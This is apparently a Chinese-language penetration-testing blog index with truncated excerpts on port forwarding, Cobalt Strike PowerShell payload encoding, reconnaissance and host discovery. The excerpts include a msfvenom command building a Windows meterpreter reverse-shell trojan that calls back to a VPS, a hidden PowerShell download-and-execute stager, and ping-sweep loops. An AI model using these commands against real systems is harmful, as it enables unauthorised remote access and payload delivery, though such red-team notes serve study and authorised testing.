iy
内网代理&端口转发
内网代理&端口转发 MSF 端口转发 先用 msfvenom 生成木马 msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=VPS地址 lport=VPS端口 -f exe -o /tmp/msf.exe msf 中设置监听 use e
CS 马编码
Powershell CS 马编码 处理前 没有经过任何处理的 PowerShell CS 马 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://VPS的IP:端口/ps'
内外网信息收集
外网信息收集 IP/域名 RapidDNS 查询,可查子域名、IP反查域名。 FOFA 查询。 Google hacking语法:site:"test.com" -www。 子域名
使用自带命令扫描存活主机
Windows for /l %i in (1,1,255) do @ ping 172.16.212.%i -w 1 -n 1|find /i "ttl=" Linux for k in $( seq 1 255);do ping -c 1 10.1.1.$k|grep "ttl"|awk -F